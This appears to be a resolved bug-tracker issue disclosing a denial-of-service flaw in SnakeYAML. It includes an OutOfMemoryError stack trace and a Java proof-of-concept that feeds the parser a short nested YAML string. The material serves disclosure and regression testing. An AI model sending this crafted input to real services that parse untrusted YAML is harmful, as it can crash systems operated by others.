OutOfMemoryError when parsing yaml data

Issue #1064 resolved
郭逸帆 created an issue

Description

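Applications that use SnakeYAML to parse untrusted YAML data may be vulnerable to denial-of-service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that causes the parser to crash with an OutOfMemoryError (Java heap space). The stack trace below shows the heap being exhausted while nested MappingNode and SequenceNode objects are converted to strings through their toString() methods. This effect may support a denial-of-service attack.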

Error Log

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at java.util.Arrays.copyOf(Arrays.java:3332)
    at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
    at java.lang.StringBuilder.append(StringBuilder.java:142)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:93)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:82)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)

PoC

// Poc.java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;

import org.yaml.snakeyaml.Yaml;

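/**
 * Reproducer for the {@link OutOfMemoryError} reported in this issue: it loads one short YAML
 * document made of nested {@code ?} (complex key) and {@code -} (sequence entry) indicators
 * with a default {@link Yaml} instance.
 *
 * <p>Intended for regression-testing a SnakeYAML build in an isolated JVM with a small, bounded
 * heap (for example {@code -Xmx64m}), so that heap exhaustion stays confined to the test process.
 *
 * @since 1.0.0
 */
public class Poc {
    /**
     * Parses {@code data} as YAML and asks SnakeYAML to construct a {@link String} from it.
     *
     * <p>Ordinary exceptions (including an NPE for a {@code null} argument) are reported on
     * standard error instead of being discarded, so a parse rejection can be told apart from
     * resource exhaustion. {@link OutOfMemoryError} is an {@link Error}, not an
     * {@link Exception}, so it is deliberately not caught here and propagates to the caller,
     * which is the failure shown in the issue's stack trace.
     *
     * @param data YAML text to load
     */
    public static void test(String data) {
        // Encode and decode with the same explicit charset; the no-argument getBytes() uses the
        // platform default, which need not match the UTF-8 reader.
        try (InputStream datastream =
                     new ByteArrayInputStream(data.getBytes(StandardCharsets.UTF_8));
             InputStreamReader reader =
                     new InputStreamReader(datastream, StandardCharsets.UTF_8)) {

            Yaml yaml = new Yaml();
            yaml.loadAs(reader, String.class);
        } catch (Exception e) {
            // Surface the parser's own rejection rather than hiding it.
            System.err.println("YAML load failed: " + e);
        }
    }

    /**
     * Runs {@link #test(String)} once with the input from the report.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        test(" ? - - ? - - ? ? - - ? ? ? - - ? ? - - ? ? ? - - ? ? - ? ? - - ? - - ? ? ? - - ? ? - ?  -? - ? ? - - ? - - ? ? ? - - ? ? - ?  -? - ? ? - - ? - ");
    }
}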

References

https://github.com/snakeyaml/snakeyaml/blob/0048722933b13dd922371bb19cd4172df2203194/src/main/java/org/yaml/snakeyaml/nodes/SequenceNode.java#L65

Comments (4)
